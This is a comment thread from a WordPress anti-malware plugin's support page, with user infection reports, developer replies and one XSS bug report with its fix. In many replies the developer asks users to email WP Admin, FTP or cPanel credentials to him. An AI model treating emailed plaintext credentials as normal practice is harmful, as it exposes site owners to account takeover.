      Thanks for praise but it looks like you still have a nasty script in there that my plugin didn’t catch yet. It generates that “work from home” content if the REFERER of USER_AGENT is Google. I would like to find this threat and add it to my definitions update.

      If you are willing to give me access to your WP Admin I will find it and remove it for you. You can send your credentials directly to me: eli at gotmls dot net

      Reply
  • On February 25, 2013 at 8:43 am, Jack Yan said:

    Hello Eli,

    It looks like a very nice and neet tool, but when I tried to have it automatically repair, it came back and reported as Failed. I scanned again and the list came up again. Here is the message:

    fixing /home/tnt/public_html/wp-content/themes/custom-community/header.php … Failed!
    fixing /home/tnt/public_html/wp-content/themes/mammoth/header.php … Failed!
    fixing /home/tnt/public_html/wp-content/themes/mantra/header.php … Failed!
    fixing /home/tnt/public_html/wp-content/themes/redbel/header.php … Failed!
    fixing /home/tnt/public_html/wp-content/themes/twentyeleven/header.php … Failed!
    fixing /home/tnt/public_html/wp-content/themes/twentytwelve/header.php … Failed!

    Can you help, please?

    Thank you!

    Jack

    Reply
    • On February 25, 2013 at 12:11 pm, Anti-Malware Admin said:

      That error means that your webserver (apache) does not have write permission on those files. You should be able to set the permissions on those files with an FTP client like Filezilla.

      If you need my help with this I could do it for you but you would need to send your FTP login info to me: eli at gotmls dot net

      Reply
  • On February 20, 2013 at 8:30 am, Lauren J. said:

    Eli, Thank you! I am astonished at your expertise. Incredible. This is better help than I could have ever imagined. I will be donating again soon!

    Reply
  • On February 12, 2013 at 9:12 pm, Linda said:

    Hi There, Happily donated! Need your help please as we have a virus on our wordpress blog and I’m not sure what to do…. It says Infection: HTML:Script-inf
    thanks,
    Linda

    Reply
    • On February 13, 2013 at 7:02 am, Anti-Malware Admin said:

      Thanks for your donation. I would be happy to help you. I can see there is some external javascript being loaded on your site. I will need to login to your WP Admin to find the source of the injection. You can send login credentials directly to me: eli at gotmls dot net

      Reply
  • On February 11, 2013 at 11:37 am, Janet Robinson said:

    Hi, donated hoping you can give me a hand. Found 2 non-wp files that were eval base 64 ridden and trashed them. Hosting had a problem a while back and I think that’s when it happened. Your scan is showing quite a few others that are warnings but I don’t know if they’re legitimate or not. Do you think you could take a look? I’ve been blocking IP addresses for days. Thank you for your plugin – I donated!

    Reply
    • On February 11, 2013 at 11:45 am, Anti-Malware Admin said:

      Thanks for your donation. I’d be happy to look at it for you.

      You can send me your WP Admin login credentials: eli at gotmls dot net

      or you can just send me an screenshot and I’ll tell you what I can if you don’t want to give out your credentials.

      Reply
  • On February 9, 2013 at 2:37 pm, Marcio Soares said:

    Hello Eli
    Excellent Plugin.
    I did a scan and it occurred to me: http://pastebin.com/WXiaEfX6
    Should I be concerned?
    I do not know how to proceed.
    What should I do?
    Thank you.

    Reply
    • On February 9, 2013 at 4:58 pm, Anti-Malware Admin said:

      Most of that looks ok and your site does not seem to be infected. The only files in that list that I don’t know about are the one in “phplist”.

      I wouldn’t be concerned unless you have any specific symptoms.

      Reply
  • On February 9, 2013 at 9:18 am, kunal pandey said:

    Hello I do want to use your plugin.
    But the problem is my client site is not running at all it is not even allow me to open the admin panel in this case can you please let me know how can i cleaned up my client site i need to done it asap.

    Please send me suggestion.

    Thanks

    Reply
    • On February 9, 2013 at 9:51 am, Anti-Malware Admin said:

      I can see that your server is sending a 500 error on every page. I can help you get your site working again and install and run my Anti-Malware plugin but I will need to start by fixing the login page.

      I need FTP access to to get started and I may need cpanel access to view the log files too.

      You can email me directly: eli at gotmls dot net

      Reply
  • On February 4, 2013 at 8:00 am, Warren said:

    Hi Eli
    So we updated the definitions and your plugin found the problems and cleared them immediately. Our exchange rate is a bit of a bastard, but you had better believe I will be back at the end of the month to donate. This is the single most useful plugin I’ve come across. Really lovely. Thanks so much.

    Warren

    Reply
  • On January 21, 2013 at 11:48 am, Steven H said:

    I am constantly amazed at the level of customer service that Eli provides for his plug-in. I have used his product on (3) separate wordpress sites, and cannot recommend it enough. Many thanks, Eli, for always being there to shrink my headaches away! Just made a donation – please keep it up!

    Reply
  • On January 18, 2013 at 8:04 am, CW said:

    Hello AMA

    I waited an hour for email to arrive but no joy? So tried to re-register but got “already registered” error message. Still nothing arrived. Shall i start from scratch?

    (no not in spam – yes – email address correct)

    Thanks

    Reply
    • On January 18, 2013 at 8:12 am, Anti-Malware Admin said:

      I’m not sure why you didn’t get it, it was in my Sent Folder. I just forwarded it to you again. Let me know if you still don’t get it.

      Reply
  • On January 14, 2013 at 3:26 pm, Greg Roth said:

    This plug in is outstanding. FIVE STARS! I made a small donation and will make more in the future. It is well worth the cost. In the 4 years that I have used WP, this may be one of the most valuable and essential plugins that I have installed.

    My site is a music news e-zine that is recognized on Google and Bing News. We cover local, national and global artists. We have readers all over the globe. If our site is down because of malware it damages our brand and reputation. In addition it denies fans coverage of some very talented music artists who work very hard practicing their craft.

    Nice to know that those of us that have had Malware issues have an ally and support in this area! Thank you, Thank you! Thank you Eli!

    I will share the link to your plug in with some of my peers!

    Greg Roth
    Founder / Chief Contributor – Seattlemusicinsider.com

    Reply
  • On January 5, 2013 at 8:59 am, Steven H said:

    Thank you so much Eli for not only creating this plugin….but also your diligence to go beyond the call of duty to find a new hidden definition. I’ll definitely be adding this to other wordpress sites and checking in regularly.

    Reply
  • On November 10, 2012 at 6:03 am, Jeff said:

    Hey Eli, just dropped by to make my monthly donation. Your plugin is so valuable to me on a month in / month out basis that it seemed only fair to make monthly donations for covering my back.

    Can’t wait for this plugin to run automatically.

    Mahalo

    Jeff

    Reply
    • On November 10, 2012 at 7:13 am, Anti-Malware Admin said:

      Thanks again!

      I have Cron Jobs on my ToDo list. First I need to get it to run independent of WordPress, so it can scan even when WordPress is not working.

      I should have that automatic scan feature ready for testing by the end of the month. Would you be interested in BETA testing?

      Reply
  • On November 2, 2012 at 2:05 pm, Tommi said:

    Eli, Get these Fresh Comments on Top, We just made another $50.00 Donation and will make another $50.00 donation in 3 – 5 days.

    This expanded protection is critical, and you have been a blessing.

    I hope people realize the time and effort you have put in and learn to appreciate its value with contributions

    Reply
  • On October 21, 2012 at 5:48 am, Edward said:

    Great work Eli,

    This is now a standard plugin for all sites, wouldn’t be without it.
    We look forward to your continued malware protection, detection and removal advancements. Keep it up!

    Reply
  • On October 19, 2012 at 1:14 am, Tony said:

    Hi, i’m infected with Pharma Hack… Just got into a lot of blogs and howtos…. Here is the thing: I was infected using wordpress 3.4.1… Just updated to 3.4.2 and all things got right again…… I’m kinda reinfected… But i can’t find any infected file using find|grep|etc… I can’t find anything in the database tables too… It’s just affecting my rss, rss2, atom feeds…. Don’t know what to do anymore…

    I try to use your plugin to see if it could help me find anything, but, no….

    Do you have any idea what could i do??? without having to reinstall all the site… because my site is kinda heavy modified by hand in various files…

    If you want to see my files and database, send me an email….

    Thanks

    Reply
    • On October 19, 2012 at 7:24 am, Anti-Malware Admin said:

      I’m happy to help you with this infection and I’m sure we can get it cleaned up.

      The first thing I see is that it doesn’t appear that you have registered my plugin on your site yet. You should do this first and then download the latest Definition Update from the Scan Setting page in your WP Admin.

      Then you can run a Complete Scan to see if it finds any “Known Threats”. If you need any help with any of this just let me know what I can do.

      Reply
  • On October 17, 2012 at 6:53 am, Tessa Tuates said:

    Found 20 Potential Threats. How will I remove this threats?

    Reply
  • On October 15, 2012 at 1:32 pm, Edward said:

    why is the scan omitting the htaccess files

    Found 0 .htaccess Threats 250 Skipped Files

    Reply
    • On October 15, 2012 at 1:43 pm, Anti-Malware Admin said:

      My guess is that the files it skipped were not .htaccess files at all. If you click on “250 Skipped Files” it will show you a list of the files that were skipped.

      If you have any more questions please don’t hesitate to ask. It might help to send me a screenshot too.

      Reply
  • On October 13, 2012 at 3:39 am, Archie Lopez said:

    how to remove / repair the “eval” potential threats? at JS

    thank you!

    Reply
    • On October 13, 2012 at 7:20 am, Anti-Malware Admin said:

      “Potential Threats” are usually ok and should not be removed. They are there just to help you find possible exploits when you cannot get your site completely clean. When I find new Threats I add them to my definitions of “Known Threats”.

      See my FAQs

      Reply
  • On October 10, 2012 at 12:41 am, lee bennett said:

    Ive been running your plugin for a few months now and its cleaned up lots of my site’s.
    this morning a couple of my sites have been blacklisted by google for a malware .
    the plugin says its clean .the infected files are all java script exploits ,because im on shared hosting its infected about 12 sites.
    I dont know if your plugin could be updated to include this but it would be great if it could .
    here are the details:
    http://labs.sucuri.net/db/malware/mwjs-iframe-injected515?v4

    Reply
    • On October 10, 2012 at 7:00 am, Anti-Malware Admin said:

      If you want to send WordPress Admin credentials to my email (wordpress at ieonly dot com) then I can get my plugin on that site to scan all the site at once. I will also look Through the “Potential Threats” to see if there are any malicious scripts that are not being identified correctly.

      Reply
  • On October 7, 2012 at 1:51 am, Jeff said:

    Eli, I just love the “quick scan” feature.

    Thank you for your continue efforts. You are a rare breed.

    Jeff

    Reply
    • On October 7, 2012 at 9:09 am, Anti-Malware Admin said:

      Thanks, There’s more to come. I’m working on a white-list feature now that should be ready by the end of the month. This will eliminate a lot of the benign scripts from coming up in the “Potential Treats” section.

      Reply
  • On September 21, 2012 at 8:38 am, Review Crew said:

    Just wanted to stop by and let people know Eli is the real deal. I own and operate Reviewboard Magazine (Reviewboard.com) and we are in a weird spot in the food chain when it comes to product reviews. Because we do reviews on just about everything consumer related we fall into the mainstream consumer publication category of which we are actually the 2nd most popular in the United States. Go figure. We ended up getting a web STD and google crippled our website by putting up the malware stop page and listing our website as a malware site. Our advertising was stopped (Adsense) and things came to a crashing halt.

    NO ONE knew how to fix this situation properly and we tried. I posted here and ELI responded within a few hours. I trusted him and gave him admin access to our website and he did not disappoint. This man is a saint. He fixed the issue I was having with his plugin, he removed all the malware issues, and we were able to submit a request for review with google… it was successful and we are now back in action.

    Without Eli we would have had to rebuild our web server VMs, our database VMs and cut, copy and paste every article we had to make sure we didn’t have any malware. This would have taken a month and hurt us badly. I can’t tell you how grateful I am to Eli and his plugin. We are forever in his debt. If you haven’t donated for this plugin, you should really go do that now. His time is worth every cent, and we will be donating regularly to help his efforts here.

    Reply
    • On September 21, 2012 at 8:55 am, Anti-Malware Admin said:

      Wow, what a great review, thanks a lot!

      Donations feed my family but this stuff feeds my soul (or maybe my ego) ;-) but it really feels good to know how much I am helping people, Thanks!

      Reply
  • On September 20, 2012 at 9:32 pm, Kamal said:

    Can you explain what is this?
    Your great plugin found this as a critical issue(vulnerability) I am just a basic WP user, so i have no idea what these codes are. I automatically fixed the issue using your plugin but these codes are same in look as it was before Using your plugin. I am using a Theme where i found this issue

    here is the path /public_html/wp-content/themes/nobeliumful/library/prelude.php
    please advice!

    Here is the codes

    Reply
    • On September 20, 2012 at 9:41 pm, Anti-Malware Admin said:

      The codes you are trying to post will not come through on a comment.

      The easiest way for me to help you is if you can send me admin credentials for you WordPress site to my email address.

      It may take 10-12 hours for me to get to it at this point.

      Reply
      • On September 20, 2012 at 9:54 pm, Kamal said:

        Thank You so much for a quick reply.
        I have jus uploaded a snapshot of the codes there.

        The image is not in its best resolution but it is enough for you to understand the problem/issue

        I really appreciate your help and support. Millions of Thanks

        here is the link
        http://ifovr.com/wp-content/uploads/2012/09/knownissue1.gif

        Reply
        • On September 21, 2012 at 7:32 am, Anti-Malware Admin said:

          I see this is a file that has already been cleaned by my plugin. Although this line of code is very cryptic and was, no doubt, a setup for malicious injection, it is missing the eval() statement at the end that would have executed this code, so it is now harmless. It’s like a bee without it’s stinger or a gun without bullets.

          I wrote this plugin to automatically remove the threats from any file without damaging the remaining code in that file. Sometimes this leads to leftover garbage in the code that is not pretty but, by itself, is not dangerous. Since there is nothing left, in this particular file of any worth, you can delete the files if you want to.

          Please let me know if you have any other question or any other files you want me to look at.

          Reply
  • On September 19, 2012 at 7:23 am, Vanessa Roberts said:

    I have never, in all my experience on the internet, found a developer so dedicated and so helpful as Eli Scheetz.

    The service that accompanies the use of this plug in is unparalleled.

    I literally can not recommend his plug in enough.

    More than worthy of any donation you can make.

    My highest praise

    Reply
  • On September 14, 2012 at 11:02 am, Jeff said:

    Cleaned up a bunch of my sites and Eli goes well past the extra mile.

    More than glad to donate

    Reply
  • On September 11, 2012 at 5:13 pm, SB Beauty said:

    Hello

    After scanning I do not have any option to remove the malware.
    I already made my Donation.

    Thanks

    Reply
    • On September 11, 2012 at 5:25 pm, Anti-Malware Admin said:

      Thanks for the donation.

      I hope you have already read the FAQ about “Potential Threats”. If so, and you have some “Known Threats” (in red), then you could send me a screenshot of the scan results or an admin login to your site and I’ll take a look at it for you.

      Reply
  • On September 9, 2012 at 4:05 am, Jeff said:

    This plugin is a lifesaver for me….glad to donate. The donation is far less than the time and money I would spend to deal with malware myself.

    Thanks much

    Reply
  • On August 28, 2012 at 12:41 pm, Kamal said:

    Hello there. I need your help

    When I tried to run your plugin on my wp 3.4.1 multisite

    i got this error while scanning all plugins folders

    Warning: preg_match_all() [function.preg-match-all]: Compilation failed: missing ) at offset 66 in /home/mydominname/public_html/wp-content/plugins/gotmls/index.php on line 78

    Please help!

    Its not Network Activated

    Your plugin is activated on the main(root) site

    Thanks in advance

    Reply
    • On August 28, 2012 at 2:32 pm, Anti-Malware Admin said:

      Thank you for reporting this bug. I have released a new definition update that fixes this issue. Just click the “Download new definitions!” button in the admin and it should work correctly after that.

      Reply
  • On August 17, 2012 at 2:15 pm, Gianfranco said:

    H! guys I just wanted say thank you so much for this amazing plugin. I was opening all my files and doing a search and replace… That worked sometimes but other times will totally destroy the site and template. I like that you added the option to revert the changes. This plug just gets better by the day. I just wanted to drop by and tell you that I will donate as soon as I get all my websites back and running. I will add all my websites and give you a good donation.

    I also made a video for those who have issues login in the admin because of malware. This will help you access the admin and also help you get all your files back up and running.

    If you go to YouTube and type Google Malware warning you will find my 4 part video on how to. https://www.youtube.com/watch?v=GMABgT2Dnas

    Again thank you for the effort and time put into the plugin. Its well appreciated.

    Reply
  • On August 12, 2012 at 6:16 am, Howard Berry said:

    Hi, have been using your plugin to clear the problem but it just returns within minutes so trying to find the back door. base64 decode is stated to be a problem but this is in your plugin. Should it be or do i need to delete this,

    Reply
    • On August 17, 2012 at 8:18 am, Anti-Malware Admin said:

      I updated definitions and expanded the search range on the site you gave me access to. It now searches starting in the public_html directory and finds the new threats that were previously undetected. I took the liberty of removing all the threats that were found within all sites in the public_html folder. Please let me know if your infection returns again. I am happy to continue working on this until you are completely clean.

      Reply
  • On August 3, 2012 at 1:47 pm, Kamal said:

    I just sirted it . I just saw an option there to scan only the THEME folder. Thanks once again.

    Reply
    • On August 4, 2012 at 6:39 am, Anti-Malware Admin said:

      Thanks, I’m glad you found it. I’m posting this answer here anyway so that others can find it too if they have the same questions.

      To scan just the Theme folder just click on the linked option “wp-content” under “Scan What:” and check the box by “themes”. This specialized scan setting does not save, so after the scan is performed it returns to the option to scan the whole wp-content folder.

      Also, I would be interested to hear why you would want to scan only the themes folder. If you want to tell me more you can email me directly at registrations at gotmls dot net.

      Reply
  • On August 3, 2012 at 1:40 pm, Kamal said:

    What a great plugin.!!

    I just want a help. Is there any way to SCAN only the THEME folder in /wp-content/themes ??

    Please advice.

    Regards

    Reply
  • On August 1, 2012 at 10:31 pm, daniel preece said:

    will donate tomorrow

    thxs danny

    Reply
  • On August 1, 2012 at 10:43 am, TrinityCross said:

    Hello there,

    Your plugin is a fantastic piece of work and really saves me alot of time trying to locate all these viruses people like to put on your website. While your plugin works well and keeps fixing the problem. The hacker keeps being able to change a line in the /wp-config.php file.

    Could I suggest that that you potentially make the plugin fix problems automatically without having to keep pressing auto repair. Because it consumes alot of your time when you keep getting the same problem every other day and then having to sign in to do the same process over and over again.

    Maybe allowing users to have the plugin (option) to fix the problem automatically without having to constantly approve it. If a potential problem arises, you can do the same as you currently do with the plugin which is revert to the previous settings.

    Reply
    • On August 1, 2012 at 11:08 am, Anti-Malware Admin said:

      Thanks you for the complement and the suggestion. I have that idea already on my To-Do-List. I am wanting to add some kind of cron job to run automated scans and email the results to the admin. Right now I am working on making the scan process more robust. If I have enough time and some good donations I should be able to work that feature in by the end of the month though.

      However, a better answer to your problem would be to stop the attacks. If you are removing all the threats and they are coming back the next day I would suspect that we have overlooked a vulnerability on your site. I would love have the opportunity to investigate why you continue to get re-hacked. If you want me to look at it for you just email directly (I will need your WP admin credentials and FTP access would help to).

      Reply
    • On September 22, 2013 at 7:09 am, marfu said:

      the scan can’t run completely, stuck in 33% and the the scree send error message like this
      Content Encoding Error

      The page you are trying to view cannot be shown because it uses an invalid or unsupported form of compression.

      Reply
      • On September 22, 2013 at 8:52 am, Anti-Malware Admin said:

        Have you tried the Complete Scan or just the Quick Scan?

        If you still can’t get it to work you can give me you WP Admin login and I’ll get in there and figure out what’s causing that error.

        Reply
  • On July 24, 2012 at 7:20 am, Rich said:

    Great Plugin… Been using it for a little bit and will donate in a few.. The only problem is I get the wordpress sites clean, however days or sometimes hours later they are re-infected.. What else can I do to get them clean and prevent re-infection?

    Thanks!

    Reply
    • On July 24, 2012 at 10:15 am, Anti-Malware Admin said:

      It sounds like my plugin is doing a good job of removing the malicous scripts that it finds :-) but it doesn’t seem to be finding the vulnerability in your WordPress site that is allowing you to get hacked :-(

      I would love to take a closer look at it for you. If I can track down the source of the infection then I can add it to my definition file so that everyone who uses my plugin will benefit.

      Reply
  • On July 23, 2012 at 5:05 pm, Admin Lotto said:

    Hi there, i give it a try on my infected website, it is work good, even when i try to hide it, this plugin still found it. now my question is, if i want to register multiple website with one account, how much the donation should be, and is it once registration and lifetime update? please advise. thank you

    Reply
    • On July 23, 2012 at 6:32 pm, Anti-Malware Admin said:

      Thanks for the complement. I am glad to hear that it worked well for you. As for how much to donate, I have not firmed that up yet, but my general thinking at this time is $10 per site (depending on your ability to pay and the number of sites you have). This is of course still completely up to you how much you give but thanks for asking.

      Reply
  • On July 16, 2012 at 12:06 pm, Rodrigo Muniz said:

    Hope you down aprove this comment, at least not until you can fix the XSS hole. The plugin has a security hole, see details:

    At index.php find the occurrence of “$_SERVER['REQUEST_URI']”
    This XSS vulnerability is exploitable, because input is not checked for html characters. To fix it we need to replace it with
    htmlspecialchars( $_SERVER['REQUEST_URI'] , ENT_QUOTES )

    Cheers from Brazil

    Reply
    • On July 20, 2012 at 10:57 am, Anti-Malware Admin said:

      This “hole” is fixed in my latest release. It was only exploitable by an WP Admin level user anyway, but I fixed it so that it would not show up as a vulnerability.

      Thanks for the heads-up!

      Reply
  • On June 7, 2012 at 9:04 pm, Fall Interacom said:

    Great plugin. and have made a donation. this plugin can be a premium plugin with some costs because solves a lot of hacker attacks issues.

    Reply
    • On June 7, 2012 at 10:39 pm, Anti-Malware Admin said:

      Thanks. The more donations I get, the more time I spend making this plugin even better. I know I could make more money if I charge for this but then I wouldn’t help as many people. I always feel good when someone voluntarily pays like you did. Thanks for your support and tell your friends.

      Reply
  • On May 30, 2012 at 4:06 am, twintea said:

    Hello ,

    Just installed your Plugin and it did a thorough scan ..lots of yellows ; am sure most of them are legit files , no problem but the bottom line is felt relieved! Now I have a scan to alert real threats and it’s really simple to use yet compact and essential ! Thanks a lot for your hard work !

    Reply
  • On April 18, 2012 at 2:17 pm, mariusz wroblewski said:

    hello, the scanner is working but I can not see anywhere the “Repair”

    Reply
    • On April 20, 2012 at 2:25 am, Anti-Malware Admin said:

      Thanks. You can only Repair “Known Threats” highlighted in RED. The “Potential Threats” in YELLOW are usually not malicious but you should still check them and if you can identify any malicious code you can send it to me and I’ll add it to the definitions as a “Known Threats”.

      Reply
      • On January 30, 2013 at 3:13 am, Flash Buddy said:

        Those ‘Yellow’ threats are for the large part javascript files. Suggest:

        Scanned to determine if iframe or reditects are in the header of footer.
        Compare file size with known good copy.

        Reply
  • On April 13, 2012 at 3:53 am, Vjatsheslav said:

    Hey,

    There should be possibility to register multiple sites with one e-mail address. I have many websites, and I don’t want to open that many e-mail addresses. I got the same malware again, someone removed the plugin and installed the script again. Does it mean the virus is on a server, or it’s simply someone hacked my password?

    Thanks.

    Reply
    • On April 20, 2012 at 2:45 am, Anti-Malware Admin said:

      Thanks for the suggestion. I am working on the feature now to allow multiple keys to be registered under one email account and user.

      If you are getting re-infected it may be that your site still has a vulnerability that continues to be exploited or, if you are on a shared host, it could be another site on the same server is infecting your site.

      I can upgrade your registration to include a higher level directory. This may allow you to scan multiple sites on your server from one admin account. If you would like to try this please email your request to registrations at gotmls.net

      Reply
  • On April 12, 2012 at 2:56 am, caporuscio tommaso said:

    Grazie per il vostro supporto prodotto ottimo.

    Reply
  • On April 3, 2012 at 8:28 am, John Pentony said:

    Just donated moments ago. Great tool. Got my server compromised weeks ago, and heard this program can prevent much of that.

    Thanks!

    Reply

Leave a Reply to Anti-Malware Admin Cancel reply

Your email address will not be published. Required fields are marked *

*

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>